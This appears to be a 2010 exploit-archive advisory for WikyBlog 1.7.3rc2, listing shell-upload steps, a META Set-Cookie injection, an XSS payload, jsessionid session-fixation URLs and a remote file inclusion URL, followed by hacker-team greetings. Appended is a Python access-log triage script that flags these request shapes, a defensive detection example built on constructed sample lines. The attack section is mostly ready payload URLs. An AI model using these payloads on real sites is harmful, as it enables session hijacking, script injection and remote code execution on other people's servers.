
WikyBlog 1.7.3rc2 XSS / Shell Upload / RFI

Posted Feb 25, 2010
Authored by indoushka

WikyBlog version 1.7.3rc2 suffers from shell upload, cross site scripting, cookie manipulation, session fixation, and remote file inclusion vulnerabilities.

tags | exploit, remote, shell, vulnerability, code execution, xss, file inclusion
MD5 | 3dde7809ab7fd5d926ab77cbf305ac16

========================================================================================                  
| # Title : WikyBlog-1.7.3rc2 Multi Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : www.iq-ty.com
| # Web Site : http://www.wikyblog.com/
| # Dork : Powered by WikyBlog
| # Tested on: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka =================================
# Exploit :

1- Upload Shell:

First, register on the web site: http://127.0.0.1/Wiky/index.php/Attach/(your name)?cmd=uploadform (use Tamper Data)

Second, go to http://127.0.0.1/Wiky/userfiles/(your name)/uploaded/ to find your uploaded shell.

2- Cookie manipulation:

Vulnerability description:

This script is vulnerable to Cookie manipulation attacks.

By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
This vulnerability affects /Wiky/index.php/Special/Main/Templates.
The impact of this vulnerability:
By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.

Attack details :
The GET variable "which" has been set to <meta+http-equiv='Set-cookie'+content='userCmd=edit'>.

GET /Wiky/index.php/Special/Main/Templates?cmd=copy&which=<meta+http-equiv='Set-cookie'+content='userCmd=edit'>

How to fix this vulnerability:
You need to filter the output in order to prevent the injection of custom HTTP headers or META tags. Additionally, with each login the application should provide a new session ID to the user.

3- Cross Site Scripting:

http://127.0.0.1/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+src=http://127.0.0.1/HomeComputer.jpg+onload=alert(213771818860)>

4- jsessionid session fixation:

Vulnerability description:

This script is vulnerable to jsessionid session fixation attacks.

By injecting a custom jsessionid, it is possible to alter the session cookie. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
This vulnerability affects /Wiky/index.php/Main.
The impact of this vulnerability:
By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.

Attack details:

http://127.0.0.1/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation

http://127.0.0.1/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushkasessionfixation

http://127.0.0.1/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixation

5- RFI:

http://localhost/Wiky/include/WBmap.php?langFile=http://localhost/c.txt?


Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ==========================================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net
www.alkrsan.net * www.kadmiwe.net * www.arhack.net
--------------------------------------------------------------------------------------------------------------
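
A defensive companion to the request patterns listed in items 1 to 5, as an added example that is not part of the original advisory or of WikyBlog: a Python triage function that flags those request shapes in web server access-log request lines. The sample lines, the finding labels and the script-extension list are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed request lines for illustration (not captured traffic).
SAMPLE_REQUESTS = [
    "GET /Wiky/index.php/Main HTTP/1.1",
    "GET /Wiky/index.php/Special/Main/Templates?cmd=copy&which=%3Cmeta+http-equiv%3D%27Set-cookie%27+content%3D%27userCmd%3Dedit%27%3E HTTP/1.1",
    "GET /Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+src=x+onload=alert(1)> HTTP/1.1",
    "GET /Wiky/index.php/Edit/Main/;jsessionid=abc123 HTTP/1.1",
    "GET /Wiky/include/WBmap.php?langFile=http://example.invalid/c.txt? HTTP/1.1",
    "POST /Wiky/index.php/Attach/alice?cmd=uploadform HTTP/1.1",
    "GET /Wiky/userfiles/alice/uploaded/notes.php HTTP/1.1",
    "GET /Wiky/userfiles/alice/uploaded/photo.jpg HTTP/1.1",
]

META_COOKIE = re.compile(r"<\s*meta[^>]*http-equiv\s*=\s*['\"]?set-cookie", re.I)
URL_SCHEME = re.compile(r"\s*[a-z][a-z0-9+.-]*://", re.I)
# Extension list is an assumption; extend it to whatever the server executes.
UPLOADED_SCRIPT = re.compile(r"/userfiles/[^/]+/uploaded/[^/]+\.(php\d?|phtml|phar)$", re.I)

def classify(request_line):
    """Return sorted finding labels for one 'METHOD target HTTP/x' request line."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return []
    url = urlsplit(parts[1])
    path, params = unquote(url.path), parse_qs(url.query)
    found = set()
    if path.endswith("/Special/Main/Templates"):
        for value in params.get("which", []):
            if set(value) & set("<>\"'"):
                found.add("markup-in-which")        # items 2 and 3
            if META_COOKIE.search(value):
                found.add("meta-set-cookie")        # item 2
    if ";jsessionid=" in path.lower():
        found.add("session-id-in-path")             # item 4
    if path.endswith("/include/WBmap.php"):
        if any(URL_SCHEME.match(v) for v in params.get("langFile", [])):
            found.add("remote-langfile")            # item 5
    if UPLOADED_SCRIPT.search(path):
        found.add("script-in-upload-dir")           # item 1
    return sorted(found)

def scan(lines):
    """Return (request_line, findings) for every line with at least one finding."""
    return [(line, f) for line in lines if (f := classify(line))]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUESTS):
        print(", ".join(findings), "<-", line)
```

The upload form request itself is not flagged, since it is normal application use; the signal for item 1 is a later request for an executable script under the per-user upload directory.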
